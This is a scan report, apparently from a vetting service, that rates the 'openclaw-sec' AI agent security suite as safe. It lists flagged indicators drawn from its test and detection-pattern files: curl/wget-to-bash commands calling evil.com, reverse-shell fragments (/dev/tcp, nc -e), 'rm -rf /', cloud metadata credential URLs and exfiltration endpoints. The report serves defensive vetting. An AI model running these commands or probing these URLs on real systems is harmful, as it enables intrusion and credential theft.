openclaw-sec Security Report — Trusted | ClawSafe

5 /100

openclaw-sec

AI Agent Security Suite - Real-time protection against prompt injection, command injection, SSRF, path traversal, secrets exposure, and content policy violations

This is a legitimate AI agent security validation suite that detects security threats in user input and tool calls using regex pattern matching. All flagged IOCs are test patterns stored in test files for validating the detector's functionality.

Skill Nameopenclaw-sec

Duration65.6s

Enginepi

✓

Safe to install

This skill is safe to use. The high-risk brief IOCs are false positives - they exist exclusively in test files as test patterns for the security detector to match against. No malicious behavior was found in the actual implementation.

Findings 3 items

Severity	Finding	Location
Info	Test file pattern contamination Pre-scan flagged many IOCs (shell commands, API keys, IPs) but all exist only in test files (*.test.ts) as test patterns for the security detector to match. No actual malicious code exists. `Pattern examples in test files for detector validation` → No action needed - these are expected test patterns	`src/**/__tests__/`
Info	Pattern definition files are legitimate The src/patterns/ directory contains regex patterns for detecting malicious inputs (SSRF, command injection, etc.). This is the core function of the security tool. `Detection patterns like 'rm -rf', 'curl\|bash', '169.254.169.254'` → No action needed - these patterns are the security tool's purpose	`src/patterns/`
Low	No allowed-tools declaration SKILL.md does not explicitly declare filesystem:READ or database:WRITE in allowed-tools. However, actual tool usage matches documented behavior. `No allowed-tools mapping provided` → Consider adding explicit allowed-tools declaration for transparency	`SKILL.md`

Resource	Declared	Inferred	Status	Evidence
Filesystem	`READ`	`READ`	✓ Aligned	CLI reads config files and optional content files
Network	`READ`	`READ`	✓ Aligned	Notification system sends webhooks when configured, but disabled by default
Database	`WRITE`	`WRITE`	✓ Aligned	better-sqlite3 for local event logging
Shell	`NONE`	`NONE`	—	No shell execution in implementation

22 Critical 17 High 122 findings

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

README.md:86

🔑

Critical API Key 硬编码 API 密钥

AKIAIOSFODNN7EXAMPLE

src/__tests__/benchmarks/performance-benchmark.test.ts:478

💀

Critical Dangerous Command 危险 Shell 命令

curl http://evil.com/script.sh | bash

src/modules/command-validator/__tests__/validator.test.ts:47

💀

Critical Dangerous Command 危险 Shell 命令

wget http://malicious.com/script.sh -O - | bash

src/modules/command-validator/__tests__/validator.test.ts:69

💀

Critical Dangerous Command 危险 Shell 命令

curl http://evil.com | bash

src/modules/command-validator/__tests__/validator.test.ts:160

💀

Critical Dangerous Command 危险 Shell 命令

bash -i >&

src/modules/command-validator/__tests__/validator.test.ts:239

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

src/modules/command-validator/__tests__/validator.test.ts:239

💀

Critical Dangerous Command 危险 Shell 命令

nc -e

src/modules/command-validator/__tests__/validator.test.ts:249

🔒

Critical Encoded Execution Base64 编码执行（代码混淆）

eval(atob(

src/modules/content-scanner/__tests__/scanner.test.ts:337

🔑

Critical API Key 硬编码 API 密钥

xoxb-1111111111111-2222222222222

src/modules/secret-detector/__tests__/detector.test.ts:160

💀

Critical Dangerous Command 危险 Shell 命令

curl http://example.com | bash

src/patterns/runtime-validation/command-injection.ts:30

💀

Critical Dangerous Command 危险 Shell 命令

curl http://malicious.com/script.sh | bash

src/patterns/runtime-validation/command-injection.ts:47

💀

Critical Dangerous Command 危险 Shell 命令

curl -sL http://evil.com | sh

src/patterns/runtime-validation/command-injection.ts:48

💀

Critical Dangerous Command 危险 Shell 命令

wget http://evil.com/script.sh -O - | bash

src/patterns/runtime-validation/command-injection.ts:80

💀

Critical Dangerous Command 危险 Shell 命令

wget -qO- http://malicious.com | sh

src/patterns/runtime-validation/command-injection.ts:81

💀

Critical Dangerous Command 危险 Shell 命令

nc -l

src/patterns/runtime-validation/command-injection.ts:217

🔑

Critical API Key 硬编码 API 密钥

sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

src/patterns/secrets/secret-patterns.ts:28

🔑

Critical API Key 硬编码 API 密钥

ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

src/patterns/secrets/secret-patterns.ts:43

🔑

Critical API Key 硬编码 API 密钥

gho_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

src/patterns/secrets/secret-patterns.ts:44

🔑

Critical API Key 硬编码 API 密钥

AIzaSyDxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

src/patterns/secrets/secret-patterns.ts:125

🔑

Critical API Key 硬编码 API 密钥

glpat-xxxxxxxxxxxxxxxxxxxx

src/patterns/secrets/secret-patterns.ts:381

💀

Critical Dangerous Command 危险 Shell 命令

curl http://evil.com/shell.sh | bash

tests/zeroleaks-pentest.ts:142

📡

High IP Address 硬编码 IP 地址

169.254.169.254

README.md:118

📡

High IP Address 硬编码 IP 地址

169.254.0.0

README.md:667

🔑

High API Key 疑似硬编码凭证

api_key = "abcdefghijklmnopqrstuvwxyz"

src/modules/secret-detector/__tests__/detector.test.ts:343

🔑

High API Key 疑似硬编码凭证

apiKey: "super_secret_key_12345678"

src/modules/secret-detector/__tests__/detector.test.ts:353

🔑

High API Key 疑似硬编码凭证

password = "MySecretPassword123"

src/modules/secret-detector/__tests__/detector.test.ts:363

🔑

High API Key 疑似硬编码凭证

api_key = "your-api-key-here"

src/modules/secret-detector/__tests__/detector.test.ts:411

📡

High IP Address 硬编码 IP 地址

169.254.1.1

src/modules/url-validator/__tests__/validator.test.ts:128

📡

High IP Address 硬编码 IP 地址

8.8.8.8

src/modules/url-validator/__tests__/validator.test.ts:191

📡

High IP Address 硬编码 IP 地址

168.63.129.16

src/modules/url-validator/__tests__/validator.test.ts:319

📡

High IP Address 硬编码 IP 地址

100.100.100.200

src/modules/url-validator/__tests__/validator.test.ts:359

📡

High IP Address 硬编码 IP 地址

172.31.255.255

src/patterns/runtime-validation/ssrf-patterns.ts:31

📡

High IP Address 硬编码 IP 地址

172.20.10.5

src/patterns/runtime-validation/ssrf-patterns.ts:32

📡

High IP Address 硬编码 IP 地址

169.254.255.255

src/patterns/runtime-validation/ssrf-patterns.ts:118

🔑

High API Key 疑似硬编码凭证

api_key = "xxxxxxxxxxxxxxxxxxxxxxxx"

src/patterns/secrets/secret-patterns.ts:285

🔑

High API Key 疑似硬编码凭证

apiKey: "xxxxxxxxxxxxxxxxxxxxxxxx"

src/patterns/secrets/secret-patterns.ts:286

🔑

High API Key 疑似硬编码凭证

access_token = 'xxxxxxxxxxxxxxxxxxxxxxxx'

src/patterns/secrets/secret-patterns.ts:287

🔑

High API Key 疑似硬编码凭证

auth-token: "xxxxxxxxxxxxxxxxxxxxxxxx"

src/patterns/secrets/secret-patterns.ts:288

🔗

Medium External URL 外部 URL

https://hooks.example.com/security

.openclaw-sec.example.yaml:68

🔗

Medium External URL 外部 URL

https://hooks.slack.com/services/YOUR/WEBHOOK/URL

.openclaw-sec.example.yaml:73

🔗

Medium External URL 外部 URL

https://discord.com/api/webhooks/YOUR/WEBHOOK/URL

.openclaw-sec.example.yaml:78

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/License-MIT-yellow.svg

README.md:5

🔗

Medium External URL 外部 URL

https://opensource.org/licenses/MIT

README.md:5

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/TypeScript-5.9-blue.svg

README.md:6

🔗

Medium External URL 外部 URL

https://www.typescriptlang.org/

README.md:6

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata

README.md:118

🔗

Medium External URL 外部 URL

https://hooks.slack.com/services/...

README.md:516

🔗

Medium External URL 外部 URL

https://discord.com/api/webhooks/...

README.md:519

🔗

Medium External URL 外部 URL

http://169.254.169.254/latest/meta-data/

README.md:675

🔗

Medium External URL 外部 URL

http://user:pass@internal-db:5432

README.md:678

🔗

Medium External URL 外部 URL

https://hooks.slack.com/services/XXX/YYY/ZZZ

src/core/__tests__/notification-system.test.ts:246

🔗

Medium External URL 外部 URL

https://discord.com/api/webhooks/XXX/YYY

src/core/__tests__/notification-system.test.ts:298

🔗

Medium External URL 外部 URL

http://evil.com/script.sh

src/modules/command-validator/__tests__/validator.test.ts:47

🔗

Medium External URL 外部 URL

http://malicious.com/script.sh

src/modules/command-validator/__tests__/validator.test.ts:69

🔗

Medium External URL 外部 URL

http://evil.com

src/modules/command-validator/__tests__/validator.test.ts:81

🔗

Medium External URL 外部 URL

http://malicious.com

src/modules/command-validator/__tests__/validator.test.ts:92

🔗

Medium External URL 外部 URL

https://pastebin.com/raw/abc123

src/modules/exfiltration-detector/__tests__/detector.test.ts:25

🔗

Medium External URL 外部 URL

https://hastebin.com/share/xyz

src/modules/exfiltration-detector/__tests__/detector.test.ts:35

🔗

Medium External URL 外部 URL

https://webhook.site/abc-123-def

src/modules/exfiltration-detector/__tests__/detector.test.ts:47

🔗

Medium External URL 外部 URL

https://eo1234.pipedream.net

src/modules/exfiltration-detector/__tests__/detector.test.ts:57

🔗

Medium External URL 外部 URL

https://mytest.beeceptor.com/data

src/modules/exfiltration-detector/__tests__/detector.test.ts:67

🔗

Medium External URL 外部 URL

https://abc123.ngrok.io/api

src/modules/exfiltration-detector/__tests__/detector.test.ts:111

🔗

Medium External URL 外部 URL

https://test.ngrok-free.app

src/modules/exfiltration-detector/__tests__/detector.test.ts:121

🔗

Medium External URL 外部 URL

https://myapp.localtunnel.me

src/modules/exfiltration-detector/__tests__/detector.test.ts:131

🔗

Medium External URL 外部 URL

https://webhook.site/test-123

src/modules/exfiltration-detector/__tests__/detector.test.ts:175

🔗

Medium External URL 外部 URL

https://hooks.slack.com/services/TFAKETEST1/BFAKETEST2/FAKE3EXAMPLE4TESTING56789

src/modules/secret-detector/__tests__/detector.test.ts:181

🔗

Medium External URL 外部 URL

http://10.0.0.1/api

src/modules/url-validator/__tests__/validator.test.ts:25

🔗

Medium External URL 外部 URL

http://172.16.0.1/secret

src/modules/url-validator/__tests__/validator.test.ts:36

🔗

Medium External URL 外部 URL

http://192.168.1.1/admin

src/modules/url-validator/__tests__/validator.test.ts:46

🔗

Medium External URL 外部 URL

http://127.0.0.1/admin

src/modules/url-validator/__tests__/validator.test.ts:68

🔗

Medium External URL 外部 URL

http://0.0.0.0/api

src/modules/url-validator/__tests__/validator.test.ts:77

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata/instance

src/modules/url-validator/__tests__/validator.test.ts:98

🔗

Medium External URL 外部 URL

http://metadata.google.internal/computeMetadata/v1/

src/modules/url-validator/__tests__/validator.test.ts:107

🔗

Medium External URL 外部 URL

http://169.254.169.254/computeMetadata/v1/

src/modules/url-validator/__tests__/validator.test.ts:117

🔗

Medium External URL 外部 URL

http://169.254.1.1/api

src/modules/url-validator/__tests__/validator.test.ts:128

🔗

Medium External URL 外部 URL

https://api.example.com/v1/users

src/modules/url-validator/__tests__/validator.test.ts:182

🔗

Medium External URL 外部 URL

http://8.8.8.8/api

src/modules/url-validator/__tests__/validator.test.ts:191

🔗

Medium External URL 外部 URL

http://user:[email protected]/api

src/modules/url-validator/__tests__/validator.test.ts:250

🔗

Medium External URL 外部 URL

http://192.168.1.1:8080/api/endpoint

src/modules/url-validator/__tests__/validator.test.ts:285

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata/instance?api-version=2021-02-01

src/modules/url-validator/__tests__/validator.test.ts:309

🔗

Medium External URL 外部 URL

http://168.63.129.16/machine?comp=goalstate

src/modules/url-validator/__tests__/validator.test.ts:319

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata/v1/hostname

src/modules/url-validator/__tests__/validator.test.ts:329

🔗

Medium External URL 外部 URL

http://169.254.169.254/opc/v1/instance/

src/modules/url-validator/__tests__/validator.test.ts:339

🔗

Medium External URL 外部 URL

http://169.254.169.254/opc/v2/instance/metadata/

src/modules/url-validator/__tests__/validator.test.ts:349

🔗

Medium External URL 外部 URL

http://100.100.100.200/latest/meta-data/instance-id

src/modules/url-validator/__tests__/validator.test.ts:359

🔗

Medium External URL 外部 URL

https://kubernetes.default.svc/api/v1/namespaces

src/modules/url-validator/__tests__/validator.test.ts:369

🔗

Medium External URL 外部 URL

https://kubernetes.default.svc.cluster.local/api

src/modules/url-validator/__tests__/validator.test.ts:379

🔗

Medium External URL 外部 URL

http://evil.com/malware.exe

src/patterns/runtime-validation/command-injection.ts:182

🔗

Medium External URL 外部 URL

https://paste.ee/p/test123

src/patterns/runtime-validation/exfiltration-patterns.ts:47

🔗

Medium External URL 外部 URL

https://abc.requestbin.com

src/patterns/runtime-validation/exfiltration-patterns.ts:64

🔗

Medium External URL 外部 URL

https://test.beeceptor.com

src/patterns/runtime-validation/exfiltration-patterns.ts:65

🔗

Medium External URL 外部 URL

https://attacker.com/collect?data=

src/patterns/runtime-validation/exfiltration-patterns.ts:80

🔗

Medium External URL 外部 URL

https://alias.serveo.net

src/patterns/runtime-validation/exfiltration-patterns.ts:115

🔗

Medium External URL 外部 URL

https://attacker.com/collect

src/patterns/runtime-validation/exfiltration-patterns.ts:130

🔗

Medium External URL 外部 URL

https://evil.com/exfil

src/patterns/runtime-validation/exfiltration-patterns.ts:131

🔗

Medium External URL 外部 URL

http://evil.com/xxe

src/patterns/runtime-validation/injection-patterns.ts:133

🔗

Medium External URL 外部 URL

http://10.255.255.255/admin

src/patterns/runtime-validation/ssrf-patterns.ts:14

🔗

Medium External URL 外部 URL

http://user:[email protected]/secret

src/patterns/runtime-validation/ssrf-patterns.ts:15

🔗

Medium External URL 外部 URL

http://172.16.0.1/api

src/patterns/runtime-validation/ssrf-patterns.ts:30

🔗

Medium External URL 外部 URL

http://172.31.255.255/admin

src/patterns/runtime-validation/ssrf-patterns.ts:31

🔗

Medium External URL 外部 URL

http://172.20.10.5/internal

src/patterns/runtime-validation/ssrf-patterns.ts:32

🔗

Medium External URL 外部 URL

http://192.168.1.1/router

src/patterns/runtime-validation/ssrf-patterns.ts:47

🔗

Medium External URL 外部 URL

http://192.168.0.1/admin

src/patterns/runtime-validation/ssrf-patterns.ts:48

🔗

Medium External URL 外部 URL

http://192.168.255.255/api

src/patterns/runtime-validation/ssrf-patterns.ts:49

🔗

Medium External URL 外部 URL

http://0.0.0.0/service

src/patterns/runtime-validation/ssrf-patterns.ts:66

🔗

Medium External URL 外部 URL

http://127.0.0.2/internal

src/patterns/runtime-validation/ssrf-patterns.ts:67

🔗

Medium External URL 外部 URL

http://169.254.169.254/latest/meta-data/iam/security-credentials/

src/patterns/runtime-validation/ssrf-patterns.ts:83

🔗

Medium External URL 外部 URL

http://169.254.169.254/meta-data/identity-credentials/ec2/security-credentials/

src/patterns/runtime-validation/ssrf-patterns.ts:84

🔗

Medium External URL 外部 URL

http://metadata.goog/computeMetadata/v1/instance/service-accounts/

src/patterns/runtime-validation/ssrf-patterns.ts:100

🔗

Medium External URL 外部 URL

http://metadata.google.internal/computeMetadata/v1/instance/attributes/

src/patterns/runtime-validation/ssrf-patterns.ts:101

🔗

Medium External URL 外部 URL

http://169.254.255.255/service

src/patterns/runtime-validation/ssrf-patterns.ts:118

🔗

Medium External URL 外部 URL

http://168.63.129.16/

src/patterns/runtime-validation/ssrf-patterns.ts:201

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata/v1/

src/patterns/runtime-validation/ssrf-patterns.ts:217

🔗

Medium External URL 外部 URL

http://100.100.100.200/latest/meta-data/

src/patterns/runtime-validation/ssrf-patterns.ts:249

🔗

Medium External URL 外部 URL

http://kubernetes.default.svc/

src/patterns/runtime-validation/ssrf-patterns.ts:267

🔗

Medium External URL 外部 URL

https://arxiv.org/abs/2502.01577

tests/zeroleaks-pentest.ts:6

🔗

Medium External URL 外部 URL

http://evil.com/shell.sh

tests/zeroleaks-pentest.ts:142

🔗

Medium External URL 外部 URL

https://arxiv.org/abs/2502.01577\n

tests/zeroleaks-pentest.ts:203

📧

Info Email 邮箱地址

[email protected]

README.md:246

📧

Info Email 邮箱地址

[email protected]

README.md:247

📧

Info Email 邮箱地址

[email protected]

README.md:248

File Tree

90 files · 767.3 KB · 25322 lines

TypeScript 78f · 19024L YAML 3f · 3786L Markdown 3f · 2394L JSON 5f · 96L JavaScript 1f · 22L

├─ ▾ 📁 plugins

│ ├─ ▾ 📁 security-input-validator-plugin

│ │ ├─ 📜 index.ts TypeScript 129L · 3.6 KB

│ │ ├─ 📜 install.ts TypeScript 69L · 2.4 KB

│ │ └─ 📋 openclaw.plugin.json JSON 16L · 411 B

│ └─ ▾ 📁 security-tool-validator-plugin

│ ├─ 📜 index.ts TypeScript 228L · 6.0 KB

│ ├─ 📜 install.ts TypeScript 69L · 2.4 KB

│ └─ 📋 openclaw.plugin.json JSON 16L · 391 B

├─ ▾ 📁 src

│ ├─ ▾ 📁 __tests__

│ │ ├─ ▾ 📁 benchmarks

│ │ │ └─ 📜 performance-benchmark.test.ts TypeScript 831L · 23.8 KB

│ │ └─ 📜 cli.test.ts TypeScript 145L · 4.0 KB

│ ├─ ▾ 📁 core

│ │ ├─ ▾ 📁 __tests__

│ │ │ ├─ 📜 action-engine.test.ts TypeScript 369L · 12.1 KB

│ │ │ ├─ 📜 async-queue.test.ts TypeScript 557L · 15.0 KB

│ │ │ ├─ 📜 config-manager.test.ts TypeScript 178L · 4.8 KB

│ │ │ ├─ 📜 database-manager.test.ts TypeScript 405L · 12.4 KB

│ │ │ ├─ 📜 logger.test.ts TypeScript 357L · 10.5 KB

│ │ │ ├─ 📜 notification-system.test.ts TypeScript 472L · 14.5 KB

│ │ │ ├─ 📜 security-engine.test.ts TypeScript 401L · 11.6 KB

│ │ │ └─ 📜 severity-scorer.test.ts TypeScript 230L · 8.3 KB

│ │ ├─ 📜 action-engine.ts TypeScript 175L · 5.3 KB

│ │ ├─ 📜 async-queue.ts TypeScript 194L · 4.7 KB

│ │ ├─ 📜 config-manager.ts TypeScript 181L · 5.5 KB

│ │ ├─ 📜 database-manager.ts TypeScript 600L · 18.9 KB

│ │ ├─ 📜 logger.ts TypeScript 293L · 7.2 KB

│ │ ├─ 📜 notification-system.ts TypeScript 402L · 10.2 KB

│ │ ├─ 📜 security-engine.ts TypeScript 583L · 19.8 KB

│ │ └─ 📜 severity-scorer.ts TypeScript 159L · 4.3 KB

│ ├─ ▾ 📁 hooks

│ │ └─ 📜 hooks.ts TypeScript 98L · 1.8 KB

│ ├─ ▾ 📁 modules

│ │ ├─ ▾ 📁 code-execution-detector

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 detector.test.ts TypeScript 228L · 8.2 KB

│ │ │ └─ 📜 detector.ts TypeScript 64L · 1.7 KB

│ │ ├─ ▾ 📁 command-validator

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 validator.test.ts TypeScript 280L · 10.2 KB

│ │ │ └─ 📜 validator.ts TypeScript 64L · 1.7 KB

│ │ ├─ ▾ 📁 content-scanner

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 scanner.test.ts TypeScript 471L · 17.0 KB

│ │ │ └─ 📜 scanner.ts TypeScript 98L · 3.1 KB

│ │ ├─ ▾ 📁 exfiltration-detector

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 detector.test.ts TypeScript 186L · 6.6 KB

│ │ │ └─ 📜 detector.ts TypeScript 64L · 1.8 KB

│ │ ├─ ▾ 📁 injection-validator

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 validator.test.ts TypeScript 189L · 6.7 KB

│ │ │ └─ 📜 validator.ts TypeScript 64L · 1.7 KB

│ │ ├─ ▾ 📁 path-validator

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 validator.test.ts TypeScript 507L · 17.9 KB

│ │ │ └─ 📜 validator.ts TypeScript 71L · 2.0 KB

│ │ ├─ ▾ 📁 prompt-injection

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 detector.test.ts TypeScript 127L · 4.3 KB

│ │ │ └─ 📜 detector.ts TypeScript 66L · 1.7 KB

│ │ ├─ ▾ 📁 secret-detector

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 detector.test.ts TypeScript 652L · 23.9 KB

│ │ │ └─ 📜 detector.ts TypeScript 87L · 2.6 KB

│ │ ├─ ▾ 📁 serialization-detector

│ │ │ ├─ ▾ 📁 __tests__

│ │ │ │ └─ 📜 detector.test.ts TypeScript 208L · 7.6 KB

│ │ │ └─ 📜 detector.ts TypeScript 64L · 1.7 KB

│ │ └─ ▾ 📁 url-validator

│ │ ├─ ▾ 📁 __tests__

│ │ │ └─ 📜 validator.test.ts TypeScript 388L · 13.4 KB

│ │ └─ 📜 validator.ts TypeScript 97L · 2.7 KB

│ ├─ ▾ 📁 patterns

│ │ ├─ ▾ 📁 obfuscation

│ │ │ └─ 📜 obfuscation-patterns.ts TypeScript 334L · 9.7 KB

│ │ ├─ ▾ 📁 prompt-injection

│ │ │ ├─ 📜 cot-hijacking-zh.ts TypeScript 170L · 5.7 KB

│ │ │ ├─ 📜 cot-hijacking.ts TypeScript 173L · 6.1 KB

│ │ │ ├─ 📜 direct-extraction-zh.ts TypeScript 380L · 12.0 KB

│ │ │ ├─ 📜 direct-extraction.ts TypeScript 200L · 6.2 KB

│ │ │ ├─ 📜 encoding-obfuscation-zh.ts TypeScript 150L · 4.1 KB

│ │ │ ├─ 📜 encoding-obfuscation.ts TypeScript 110L · 3.2 KB

│ │ │ ├─ 📜 extraction-attacks-zh.ts TypeScript 183L · 5.4 KB

│ │ │ ├─ 📜 extraction-attacks.ts TypeScript 186L · 5.8 KB

│ │ │ ├─ 📜 index.ts TypeScript 46L · 2.0 KB

│ │ │ ├─ 📜 instruction-override-zh.ts TypeScript 309L · 10.0 KB

│ │ │ ├─ 📜 instruction-override.ts TypeScript 125L · 4.5 KB

│ │ │ ├─ 📜 jailbreak-attempts-zh.ts TypeScript 326L · 9.5 KB

│ │ │ ├─ 📜 jailbreak-attempts.ts TypeScript 232L · 7.4 KB

│ │ │ ├─ 📜 policy-puppetry-zh.ts TypeScript 176L · 5.3 KB

│ │ │ ├─ 📜 policy-puppetry.ts TypeScript 179L · 5.5 KB

│ │ │ ├─ 📜 role-manipulation-zh.ts TypeScript 100L · 3.4 KB

│ │ │ ├─ 📜 role-manipulation.ts TypeScript 56L · 1.9 KB

│ │ │ ├─ 📜 social-engineering-zh.ts TypeScript 404L · 12.1 KB

│ │ │ ├─ 📜 social-engineering.ts TypeScript 236L · 7.1 KB

│ │ │ ├─ 📜 system-impersonation-zh.ts TypeScript 87L · 2.6 KB

│ │ │ └─ 📜 system-impersonation.ts TypeScript 56L · 1.8 KB

│ │ ├─ ▾ 📁 runtime-validation

│ │ │ ├─ 📜 code-execution-patterns.ts TypeScript 237L · 7.5 KB

│ │ │ ├─ 📜 command-injection.ts TypeScript 256L · 8.0 KB

│ │ │ ├─ 📜 exfiltration-patterns.ts TypeScript 137L · 4.8 KB

│ │ │ ├─ 📜 injection-patterns.ts TypeScript 190L · 5.7 KB

│ │ │ ├─ 📜 path-traversal-patterns.ts TypeScript 277L · 7.9 KB

│ │ │ ├─ 📜 serialization-patterns.ts TypeScript 200L · 6.3 KB

│ │ │ ├─ 📜 sql-injection-patterns.ts TypeScript 170L · 5.1 KB

│ │ │ ├─ 📜 ssrf-patterns.ts TypeScript 273L · 8.7 KB

│ │ │ └─ 📜 template-injection-patterns.ts TypeScript 157L · 4.8 KB

│ │ └─ ▾ 📁 secrets

│ │ └─ 🔑 secret-patterns.ts ⚠ TypeScript 582L · 16.3 KB

│ ├─ ▾ 📁 types

│ │ └─ 📜 index.ts TypeScript 112L · 2.5 KB

│ └─ 📜 cli.ts TypeScript 801L · 24.7 KB

├─ ▾ 📁 tests

│ └─ 📜 zeroleaks-pentest.ts TypeScript 314L · 11.4 KB

├─ 📋 _meta.json JSON 5L · 131 B

├─ 📋 .openclaw-sec.example.yaml YAML 107L · 2.8 KB

├─ 📋 config.example.yaml YAML 80L · 1.7 KB

├─ 📝 CONTRIBUTING.md Markdown 350L · 7.7 KB

├─ 📜 jest.config.js JavaScript 22L · 454 B

├─ 📋 package.json JSON 39L · 1023 B

├─ 📋 pnpm-lock.yaml YAML 3599L · 115.9 KB

├─ 📝 README.md Markdown 1014L · 22.9 KB

├─ 📝 SKILL.md Markdown 1030L · 23.3 KB

└─ 📋 tsconfig.json JSON 20L · 477 B

Dependencies 3 items

Package	Version	Source	Known Vulns	Notes
`better-sqlite3`	`^12.6.2`	npm	No	SQLite driver for local database only
`commander`	`^14.0.3`	npm	No	CLI framework
`yaml`	`^2.8.2`	npm	No	Config file parsing

Security Positives

✓ Clean implementation - no shell execution, no credential harvesting, no C2 communication

✓ Uses SQLite for local-only storage (better-sqlite3) - no remote database

✓ Notification system is disabled by default and requires explicit configuration

✓ Pattern matching is purely read-only analysis - no code execution

✓ Well-structured TypeScript with proper error handling

✓ Plugin system validates input without modifying agent behavior

✓ Async database writes don't block validation

✓ Comprehensive test coverage for detection accuracy

Scan Report

Findings 3 items

File Tree

Dependencies 3 items

Security Positives